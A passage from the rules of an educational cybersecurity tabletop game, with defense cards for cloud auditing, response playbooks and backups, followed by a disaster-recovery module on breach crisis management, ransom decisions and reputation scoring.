└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy continuous cloud configuration│
│ monitoring (AWS Config, Azure Policy│
│ Manager, GCP Cloud Asset Inventory).│
│ Scan for misconfigured resources: │
│ - Public S3 buckets │
│ - Overly permissive IAM policies │
│ - Unencrypted databases │
│ - Open security groups │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects misconfigurations that allow│
│ unauthorized access: │
│ - Public database access │
│ - Exposed credentials in configs │
│ - Overly broad IAM permissions │
│ - Disabled encryption/logging │
│ Alert on drift from secure baseline.│
│ │
│ LIMITATION: Only catches known │
│ misconfiguration patterns. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Audit all IAM roles, service │
│ accounts, and API credentials for │
│ over-privilege. Implement least- │
│ privilege access. Regularly review │
│ who has what permissions. Detect │
│ and revoke unused credentials. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad │
│ permissions │
│ - Service accounts with admin access│
│ - Stale credentials from departed │
│ employees │
│ - Cross-account trust abuse │
│ Reduces blast radius if credentials │
│ are compromised. │
│ │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Enable comprehensive cloud audit │
│ logging (CloudTrail, Stackdriver, │
│ Activity Monitor). Forward all logs │
│ to immutable, centralized storage. │
│ Monitor for unauthorized API calls, │
│ data access, and resource changes. │
│ Enable MFA Delete on audit logs. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Provides forensic trail for: │
│ - Detecting API token abuse │
│ - Investigating data exfiltration │
│ - Compliance reporting │
│ - Incident response timeline │
│ Prevents attackers from covering │
│ tracks (immutable logs). Enables │
│ rapid investigation of cloud API │
│ compromises. │
│ │
│ COST: High storage requirements. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Pre-built, tested ransomware response│
│ playbook covering: │
│ - Immediate network isolation steps │
│ - Communication procedures │
│ - Forensic data collection │
│ - Restoration procedures │
│ - Stakeholder notifications │
│ Train incident response team on │
│ playbook annually. │
├─────────────────────────────────────┤
│ EFFECT: │
│ During Phase 2 or when ransomware │
│ is detected: │
│ Get +4 bonus to defense rolls when │
│ responding to ransomware threats. │
│ Reduces response time, limiting │
│ damage. │
│ │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE │
│ RESPONSE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Pre-built playbook for credential │
│ compromise scenarios: │
│ - Identify affected accounts │
│ - Forced password reset procedures │
│ - Session invalidation │
│ - MFA re-enrollment process │
│ - Forensic user activity review │
│ - Privileged account audit │
├─────────────────────────────────────┤
│ EFFECT: │
│ When investigating compromised │
│ credentials: │
│ Get +4 bonus to defense rolls. │
│ Allows rapid containment before │
│ lateral movement occurs. │
│ │
│ EXAMPLE USE: During "Mimikatz │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Comprehensive insider threat │
│ response playbook including: │
│ - HR coordination protocols │
│ - Legal review and preservation │
│ - Forensic evidence collection │
│ - Physical security response │
│ - System access removal procedures │
│ - Communication to management │
│ Requires cross-functional team │
│ coordination. │
├─────────────────────────────────────┤
│ EFFECT: │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls. │
│ Requires strong organizational │
│ processes to be effective. │
│ │
│ EXAMPLE USE: When "Malicious │
│ Insider Data Theft" is detected, │
│ playbook coordinates response across │
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH │
│ RESPONSE │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Specialized playbook for supply │
│ chain compromises: │
│ - Vendor notification procedures │
│ - Industry coordination │
│ - Affected system inventory │
│ - Patch deployment prioritization │
│ - Third-party impact assessment │
│ - Public communication strategy │
├─────────────────────────────────────┤
│ EFFECT: │
│ During Phase 2 when defending │
│ against supply chain attacks: │
│ Get +5 bonus to defense rolls. │
│ Requires vendor relationships and │
│ industry collaboration. │
│ │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement the 3-2-1 backup rule: │
│ - 3 copies of data │
│ - 2 different media types │
│ - 1 copy offline/offsite │
│ Regular backup verification testing.│
│ Document retention and recovery RPO/│
│ RTO (Recovery Point/Time Objectives).│
├─────────────────────────────────────┤
│ EFFECT: │
│ If ransomware encrypts data: │
│ Recovery becomes possible without │
│ paying ransom. Offline backups │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact │
│ significantly. │
│ │
│ LIMITATION: Only effective if │
│ backups are regularly tested and │
│ truly offline. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy backup storage with WORM │
│ (Write-Once-Read-Many) protection. │
│ Once backups are written, they │
│ cannot be modified or deleted, │
│ even by administrators. Implement │
│ MFA Delete on storage. Use air-gapped│
│ backup network. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Even if attacker gains admin access │
│ or compromises backup system: │
│ Backups remain protected and │
│ unmodifiable. Enables guaranteed │
│ recovery. Works against double- │
│ extortion ransomware attacks. │
│ │
│ COST: Higher storage cost for │
│ immutable solutions. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish comprehensive disaster │
│ recovery plan (DRP) including: │
│ - Failover procedures │
│ - Alternate site readiness │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols │
│ - Key personnel contacts │
│ Conduct quarterly DRP drills and │
│ recovery testing. │
├─────────────────────────────────────┤
│ EFFECT: │
│ During ransomware or supply chain │
│ attacks: │
│ Get +3 bonus to all defense rolls │
│ after initial containment. Enables │
│ business continuity. │
│ │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘
Against Supply Chain Attacks (T-13, T-14): - D-31: Container Image Scanning - D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks) - D-40: Playbook: Supply Chain Breach Response
Against Insider Threats (T-15, T-16): - D-28: Baseline Behavior Learning System - D-29: Process Behavior Analysis - D-39: Playbook: Insider Threat Response
Against IoT Compromise (T-17): - D-25: Application Whitelisting - D-31: Container Image Scanning (if containerized) - D-28: Baseline Behavior Learning System
Against Cloud API Abuse (T-18): - D-34: Cloud Configuration Auditing - D-35: Cloud Access & Permission Auditing - D-36: Cloud Compliance & Audit Trail
Against DNS Tunneling (T-19): - D-28: Baseline Behavior Learning System (network baseline) - D-30: Machine Learning Anomaly Detection
Against Physical Security Bypass (T-20): - D-28: Baseline Behavior Learning System (detection) - D-38: Playbook: Credential Compromise Response
Against Ransomware (T-11, supply chain variants): - D-41: Backup Strategy - 3-2-1 Rule - D-42: Immutable Backup Storage - D-43: Disaster Recovery Plan & Testing - D-37: Playbook: Ransomware Response
Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)
Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining
Final Security Score Calculation (v2.2 formula): - (8 defenses deployed × 5) = 40 points - (0 hardening upgrades × 2) = 0 points - (1 playbook × 10) = 10 points - (3 of 4 pentester tactics defended × 5) = 15 points - Budget efficiency: (30 / 150) × 10 = 2 points - Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)
When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):
Why it matters: - Stops 90%+ of malware variants if properly configured - "Defense in depth" - cheap to start, expensive to perfect - Trade-off: Security vs. usability (users can't run unauthorized apps)
Real-world context: - Used by government agencies and financial institutions - Apple's approach (iOS/macOS sandboxing) - Increasingly common in "zero trust" architectures
Discussion points: - "What's blocked by living-off-the-land blocker that regular whitelisting isn't?" - "Why is adoption slow despite effectiveness?"
Why it matters: - Catches attacks that don't match known signatures - Foundation for modern threat detection - Requires "normal" baseline to be effective
Real-world context: - Splunk, Elastic, Sentinel use behavioral analytics - UEBA systems detect insider threats - Process behavior monitoring by Crowdstrike, Falcon, Tanium
Discussion points: - "What counts as 'abnormal' and who decides?" - "How do you build a baseline without including attacks?" - "Why can't signature-based antivirus do this?"
Why it matters: - Container environments have unique attack surfaces - Rapid deployment means traditional approaches fail - Network segmentation at container level is powerful
Real-world context: - Kubernetes is now the standard container orchestrator - Docker/container adoption is 90%+ in enterprises - Container escape vulnerabilities (runc, containerd, etc.)
Discussion points: - "How is container security different from VM security?" - "Why is network policy critical in Kubernetes?" - "What's an example of a container escape attack?"
Why it matters: - Cloud misconfigurations are leading breach cause - Shared responsibility model confuses organizations - API-driven access requires different monitoring
Real-world context: - Hundreds of millions exposed via public S3 buckets - Capital One breach: misconfigured WAF - Equifax: unpatched open-source component in cloud environment
Discussion points: - "Who's responsible for cloud security: vendor or organization?" - "How do you audit permissions when there are 1000s of IAM roles?" - "Why is 'least privilege' hard to achieve in practice?"
Why it matters: - Pre-planning reduces response time significantly - Coordination across teams is critical - Written procedures prevent panic decisions
Real-world context: - Organizations without playbooks average 9+ month detection time - With playbooks, average drops to 3-4 months - Playbooks required by HIPAA, PCI-DSS, NIST frameworks
Discussion points: - "Who should be involved in ransomware response?" - "How do you balance forensics with business recovery?" - "Why test playbooks if you hope to never use them?"
Why it matters: - Ransomware made backups critical (not just compliance) - Recovery is often cheapest way to respond to attacks - Immutable backups prevent attacker deletion
Real-world context: - Many ransomware attacks double-extort (steal + encrypt) - Immutable backups became critical after backup deletion attacks - AWS S3, Azure Blob WORM protection adopted widely
Discussion points: - "Can backups be targeted by attackers?" - "What's the difference between backup and disaster recovery?" - "Why would immutable backups be controversial?"
| Card | Title | Tier | Budget | Countermeasure |
|---|---|---|---|---|
| D-25 | Application Whitelisting | BASIC | 10 | MALWARE |
| D-26 | Advanced Application Control with AI | ADVANCED | 15 | MALWARE |
| D-27 | Living-Off-The-Land Blocker | ELITE | 25 | MALWARE |
| D-28 | Baseline Behavior Learning System | ADVANCED | 15 | NETWORK |
| D-29 | Process Behavior Analysis | ADVANCED | 15 | MALWARE |
| D-30 | Machine Learning Anomaly Detection | ELITE | 25 | MALWARE |
| D-31 | Container Image Scanning | BASIC | 10 | MALWARE |
| D-32 | Container Runtime Protection | ADVANCED | 15 | MALWARE |
| D-33 | Kubernetes Network Policy & RBAC | ELITE | 25 | NETWORK |
| D-34 | Cloud Configuration Auditing | BASIC | 10 | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing | ADVANCED | 15 | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail | ELITE | 25 | DATA EXFIL |
| D-37 | Playbook: Ransomware Response | ADVANCED | 15 | MALWARE |
| D-38 | Playbook: Credential Compromise Response | ADVANCED | 15 | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response | ELITE | 25 | DATA EXFIL |
| D-40 | Playbook: Supply Chain Breach Response | ELITE | 25 | WEB EXPLOIT |
| D-41 | Backup Strategy - 3-2-1 Rule | BASIC | 10 | MALWARE |
| D-42 | Immutable Backup Storage | ADVANCED | 15 | MALWARE |
| D-43 | Disaster Recovery Plan & Testing | ELITE | 25 | MALWARE |
Total Expansion Cards: 19 (D-25 to D-43) Budget Range: 10 (BASIC) to 25 (ELITE) Distribution: 4 BASIC (D-25, D-31, D-34, D-41), 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42), 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)
Setup: - 5-card threat chain (mix of base + expansion threats) - Starting Budget: 120 - Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]
Incident Response Attack Chain Example: 1. Compromised Software Vendor Update (T-13) → MALWARE 2. Lateral Movement via SMB (T-04) → NETWORK 3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE 4. Disgruntled Employee Sabotage (T-16) → MALWARE 5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL
Incident Response Recommended Defense Starting Hand: - D-31: Container Image Scanning (10) - D-28: Baseline Behavior Learning System (15) - D-34: Cloud Configuration Auditing (10) - D-35: Cloud Access & Permission Auditing (15) - D-37: Playbook: Ransomware Response (15) - reusable
Hardening Strategy: - Deploy D-32, D-33 for container security - Deploy D-36 for cloud audit trails - Deploy D-30 for insider threat detection - Prepare D-39 playbook for insider coordination
Pentester Tactics to Draw (Hardening): 1. PT-07: Supply Chain Compromise (countered by D-31, D-40) 2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30) 3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)
Total Threats: 20
Base Defense Cards: 24
Recommended Play: Use subsets based on experience level - Beginners: Base deck only - Intermediate: Base + 4 expansion threats (choose scenario) - Advanced: Base + all expansion cards
Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections
docs/rules/module-disaster-recovery.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
v2.2: the card system is canonical. The Disaster Recovery game is played with 12 Crisis Action cards (plus ACTION-13), 12 Event cards, and 5 Stakeholder cards. Track advances are deterministic — dice are used only for the optional Justification bonus and ACTION-13's "no guarantee" roll. See
cards/disaster-recovery/for the cards themselves and v2.2 Playtest Edition Changes at the bottom of this document for what changed.
The Disaster Recovery Module teaches crisis management and breach response when incident detection fails. This module is typically entered after losing an Incident Response module (representing an undetected or uncontained breach) but can also be played standalone to teach DR concepts.
This is not a "second chance" to solve the attack chain. Instead, it simulates the real-world consequences of a successful breach: - Crisis management under pressure - Stakeholder communication (board, customers, regulators) - Forensic investigation with limited budget - Public disclosure and legal requirements - Incident containment and damage assessment - Financial impact and recovery costs
Incident Response: Teaches proactive threat detection and investigation Hardening (typically after an IR win): Teaches proactive defense and resilience Disaster Recovery (typically after an IR loss): Teaches crisis management, consequences, and recovery
| Component | Count | Purpose |
|---|---|---|
| Crisis Action cards (ACTION-01 to ACTION-13) | 13 | The actions teams play each turn |
| Event cards (EVENT-01 to EVENT-12) | 12 | 6 Scheduled + 6 Triggered pressure events |
| Stakeholder cards (STAKE-01 to STAKE-05) | 5 | Five trust meters (0-100%) |
| Progress tracks | 3 | Investigation %, Remediation %, Communication % (0-100%) |
| d20 | 1 | Optional Justification bonus; ACTION-13 "no guarantee" roll |
| Track/trust sheets | — | See print pack (coming) — a piece of paper works fine |
Money mapping: 1 Budget ≈ $50K. All dollar figures (fines, ransoms) use this mapping unless marked narrative-only.
Trigger: Team lost the Incident Response module by either: - Reaching Turn 10 with unrevealed cards remaining, OR - Running out of Budget (reaching 0)
Outcome: The attack chain proceeded undetected. The threat actor succeeded.
(Standalone play: skip Incident Response and start here — see the standalone guide.)
The Threat Orchestrator reveals the entire unrevealed attack chain to the Blue Team: - All hidden Threat cards are shown - The complete attack progression is explained - The attacker's objectives are stated
Example Revelation: "Your security team was unable to detect the attack in time. The attacker successfully: 1. Sent a phishing email (SOCIAL ENGINEERING) 2. Harvested credentials (CREDENTIAL ABUSE) 3. Moved laterally across your network (NETWORK) 4. Dumped admin credentials (CREDENTIAL ABUSE) 5. Exfiltrated your entire customer database (DATA EXFIL)
The attacker is now threatening to publish the data unless you pay $1M (20 Budget). You have 72 hours before regulators must be notified."
Budget floor is 0. Budget can never go negative; the free Holding Statement action is always available.
Set the three progress tracks to 0%: Investigation, Remediation, Communication.
Set the five stakeholder trust meters to their starting values: Customers 50%, Regulators 60%, Media 40%, Board 70%, Executives 80%. Meters clamp to 0-100%.
Build the Event Timeline: place the 6 Scheduled events on their turns (EVENT-01 Turn 2, EVENT-04 Turn 3, EVENT-03 + EVENT-09 Turn 5, EVENT-02 Turn 6, EVENT-12 Turn 7). Lay the 6 Triggered events face-up where their conditions can be read.
Ransom scenarios: note the ransom deadline (default: start of Turn 5) and put ACTION-13 where the team can see it.
Reputation is NOT tracked during play. It is computed once, at game end (see Final Scoring). During play, the three tracks and five trust meters are the whole state.
The game lasts 8 turns. Each turn is one crisis phase of ~6-12 hours of narrative time:
| Turn | Narrative Time | Key Deadline |
|---|---|---|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Internal legal/executive escalation complete (narrative; this was mislabeled a "regulatory deadline" in v2.1 — the regulatory anchor is GDPR 72h) |
| 3 | +18h | Board Meeting (EVENT-04) |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended (ACTION-09); default ransom deadline (ACTION-13) |
| 6 | +48h | Regulatory escalation begins (EVENT-02): -10 Regulator trust per un-notified turn |
| 7 | +60h | Government subpoena (EVENT-12) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |
All deadlines on every card use this clock. There are no 12-hour, 24-hour, 30-day, or 60-day timers anymore; the former 30/60-day deadlines are deferred final-scoring consequences (see Final Scoring).
(Exception: EVENT-08 Second Breach extends play to Turn 10, once per game. Scoring deadlines do not move.)
Each turn:
1. START OF TURN - Complete any in-flight multi-turn action that finishes now (apply its track advance) - Reveal and resolve this turn's Scheduled event - Check all un-fired Triggered events; resolve any whose condition is met - Apply decay/deadline penalties (e.g., Customer decay, Regulator -10/turn from Turn 6 if un-notified)
2. TEAM ACTION (2-3 minutes discussion) - Play ONE Crisis Action card: pay its Budget cost, apply its track advance - Multi-turn actions (Duration N): the card occupies your action slot only on the turn started; its advance completes at the start of the Nth following turn. Only one multi-turn action in flight at a time. - Or take the free Holding Statement (0 Budget, +5% Communication; always available, counts as a Communication action for decay purposes) - Optional Justification bonus (v2.2): if the team gives a strong, specific technical justification for the action, the TO may allow a d20 roll — on 11+, that action's track advance gains +5%. This is the only d20 in track advancement, and it is a bonus, never a gate. - ACTION-13 (Ransom Decision) may be declared at any time before the ransom deadline; it does not use the action slot and happens once per game.
3. APPLY STAKEHOLDER EFFECTS - Apply the played action's trust effects (table below)
4. END OF TURN - Check the loss condition: any stakeholder trust at 0% = immediate loss ("the company collapses") - Advance the turn counter
| Action | Trust effects when completed |
|---|---|
| ACTION-01 Forensic Analysis | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | — |
| ACTION-03 Log Analysis | — |
| ACTION-04 Third-Party IR | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Executives +5 |
| ACTION-06 Containment | Executives +5 |
| ACTION-07 Rebuild from Backup | Executives +5, Customers +5, Board +5 |
| ACTION-08 Credential Reset | Executives +5 |
| ACTION-09 Customer Notification | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Regulators +20 |
| ACTION-11 Media Management | Media +20, Customers +10 |
| ACTION-12 Board Communication | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | — (scoring effects only) |
| Holding Statement (free) | — (stops Customer decay) |
Where a Stakeholder card lists a range (e.g., "+2-5%"), this table is the single authoritative value (v2.2).
| Deadline | Turn | If missed |
|---|---|---|
| Internal legal/executive escalation | End of Turn 2 | Narrative only |
| Customer notification (ACTION-09) | End of Turn 5 (recommended) | Customer trust -10 per later turn; EVENT-05 Class Action may trigger; never notified = -15 Reputation at final scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) — GDPR 72h | End of Turn 8 (escalating from Turn 6) | Regulator trust -10 per turn from Turn 6 while un-notified; never notified = -20 Reputation at final scoring (deferred fine) |
If the scenario includes a ransom/extortion demand, the team must resolve ACTION-13: Ransom Decision before the ransom deadline (default: start of Turn 5). Exactly one option, once per game:
| Option | Cost | Reputation (at scoring) | Effect |
|---|---|---|---|
| PAY | 20 Budget (≈ $1M) | -15 | Data-publication event skipped/cancelled; +20% Remediation immediately. No guarantee: TO rolls d20 — on 1-5 the keys don't work: no refund, +0% Remediation (publication stays cancelled). |
| NEGOTIATE | 5 Budget | -5 | Data-publication event delayed by 2 turns (default: to start of Turn 7). |
| REFUSE | 0 Budget | 0 (-20 if the data-publication event later triggers) | No payment, no delay. |
Data-publication event: if the team has not PAID by the (possibly delayed) deadline, the attacker publishes the stolen data: Customer trust -20, Media trust -15, plus the REFUSE scoring penalty if applicable.
Corrected facts (v2.2): payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage. The FBI discourages payment. Payment guarantees nothing.
Decision Framework for Teams: - Small company, limited budget: may pay (can't afford extended downtime) - Large company, security-conscious: often refuses (sets precedent, funds crime) - Critical infrastructure: may negotiate with government assistance - Regulated industry / sanctioned actor: payment may be legally impossible
Educational Purpose: the ethical and practical considerations of ransom decisions; no "right" answer — it depends on risk tolerance.
Immediate Costs (paid from DR Budget, floor 0): - Crisis Action card costs (see the Crisis Action deck) - Event costs (subpoena legal fees, regulatory fine, lost revenue) - Ransom payment or negotiation (ACTION-13)
Deferred/Ongoing Costs (narrative-only; discuss in debrief): - Credit monitoring, legal costs, long-tail regulatory exposure, customer churn - Real-world scale: GDPR fines run up to €20M or 4% of global turnover, whichever is higher; total breach costs typically run to millions
The scoring system captures deferred consequences as Reputation penalties (below) rather than as a parallel money ledger.
Reputation is computed once, at game end. The three tracks and five trust meters drive play; Reputation (0-100) is the outcome measure.
FINAL REPUTATION = 100, then apply:
1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
50-100% -> -0
25-49% -> -5
10-24% -> -10
0-9% -> -20
2. STAKEHOLDER TRUST (average of the five meters at game end)
70%+ -> +5
50-69% -> 0
30-49% -> -10
below 30 -> -20
3. DECISION & EVENT MODIFIERS (each applies at most once)
+5 Customers notified transparently by end of Turn 5 (ACTION-09)
+3 per completed quality investigation (ACTION-01 or ACTION-04),
MAX +6 total per game
-5 ACTION-13 NEGOTIATE (only one ACTION-13
-15 ACTION-13 PAY modifier can apply)
-20 ACTION-13 REFUSE and data was published
-10 EVENT-05 Class Action triggered
-10 EVENT-06 Regulatory Fine triggered
-10 EVENT-08 Second Breach triggered
-15 Customers never notified in-game (deferred statutory violation)
-20 Regulators never notified in-game (deferred GDPR fine)
4. CLAMP the result to 0-100.
| Final Reputation | Outcome | Interpretation |
|---|---|---|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |
Below 20% trust is a CRITICAL warning state only — it triggers escalation events but is never itself a loss. The old "<30% trust = loss" rule is removed.
Default: the Reputation computation starts at 100 for every game. As a clearly-labelled optional difficulty variant, start the computation lower for bigger breaches:
| Scope | Records | Start computation at |
|---|---|---|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |
Scenario: "The Ransomware Nightmare" — customer database encrypted and exfiltrated (500K records), ransom demand $1M (20 Budget), publication threatened. Standalone play, default difficulty. Budget 50.
| Turn | Action (cost) | Tracks | Events & trust |
|---|---|---|---|
| 1 | ACTION-02 Threat Hunting (8); justification roll 14 → +5% | Inv 20 | — |
| 2 | ACTION-06 Containment (8) | Rem 15 | EVENT-01: no media action yet → Media 40→30. Exec +5 → 85 |
| 3 | ACTION-10 Notify Regulators (8); declare ACTION-13 NEGOTIATE (5) | Comm 10 | Customer decay (no Communication action completed yet at start of turn): Customers 50→40. Regulators 60→80. EVENT-04 unprepared (no ACTION-12) → Board 70→50. Publication delayed to start of Turn 7 |
| 4 | ACTION-05 Patch & Harden (10) | Rem 35 | No more decay (ACTION-10 completed). Exec +5 → 90 |
| 5 | ACTION-09 Customer Notification (10) | Comm 30 | Customers 40→55, Media 30→35. EVENT-03 passed → +5 Rep at scoring. (Private company: skip EVENT-09) |
| 6 | Holding Statement (0) | Comm 35 | EVENT-02: already notified → Regulators +5 → 85. EVENT-08 check: Rem 35 ≥ 30 → does not fire |
| 7 | Holding Statement (0) | Comm 40 | Data published (unpaid): Customers 55→35, Media 35→20. EVENT-12: Exec 90→80, Budget 1→0, Inv +5% → 25 |
| 8 | Holding Statement (0) | Comm 45 | Media at 20 (not below 20) → EVENT-07 does not fire. Game ends |
Budget spent: 8+8+8+5+10+10 = 49 of 50 (then -5 subpoena fees, floored at 0).
Final state: Tracks: Inv 25, Rem 35, Comm 45. Trust: Customers 35, Regulators 85, Media 20, Board 50, Executives 80 → average 54.
Scoring: - Tracks: Inv 25 (-5), Rem 35 (-5), Comm 45 (-5) → -15 - Trust average 54 → 0 - Modifiers: +5 (transparent customer notification by Turn 5), -5 (NEGOTIATE) → 0 - Final Reputation: 100 - 15 = 85 → Exemplary (barely!)
Lessons visible in the example: the team skipped board prep (Board Meeting hurt), never bought media management (publication nearly triggered a frenzy at Media 20), and threading the ransom deadline with NEGOTIATE bought exactly enough time to notify everyone first. One different choice and this is a 70s game.
Mandatory-path check (v2.2): the cheapest mandatory beats — investigate (ACTION-03: 5), notify regulators (ACTION-10: 8), notify customers (ACTION-09: 10), remediate (ACTION-08: 6) — cost 29 Budget. A stronger path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44. Both fit a 50-Budget team with room for events.
See the worked example above. Key tension: ransom decision vs. notification deadlines.
Attack chain revealed: disgruntled employee → lateral movement → Mimikatz → insider data theft. Data already for sale on dark web (no ransom demand — skip ACTION-13).
Suggested line of play (Budget 50-60): 1. Turn 1: ACTION-03 Log Analysis (5) — establish the insider's access timeline 2. Turn 2: ACTION-01 Forensic Analysis (12, Duration 2) — evidence for HR/legal/prosecution 3. Turn 3: ACTION-10 Regulatory/Law-Enforcement Notification (8) — FBI referral 4. Turn 4: (forensics completes: +25% Inv, +3 at scoring) ACTION-08 Credential Reset (6) 5. Turn 5: ACTION-09 Customer Notification (10) — transparent disclosure 6. Turn 6-8: ACTION-06 Containment (8), then Holding Statements
Teaching point: insider threats hit Executive and Board trust hardest; internal communication matters as much as external.
Attack chain revealed: compromised vendor update → lateral movement → cloud API token theft → DNS tunneling exfiltration → persistent C2.
Teaching point: teams quickly realize they cannot finish remediation by Turn 8 — ACTION-07 rebuilds and ACTION-04 third-party IR eat the clock and the budget. That is the lesson: some incidents transition to months-long response. Expect a "Damaged"-tier result even from good play, and debrief why (complex incidents score lower on the same rubric).
After DR Phase completion, run a structured debrief:
Incident Response Skills: - Prioritize crisis response actions under pressure - Coordinate across teams and stakeholders - Make decisions with incomplete information - Understand forensic investigation requirements
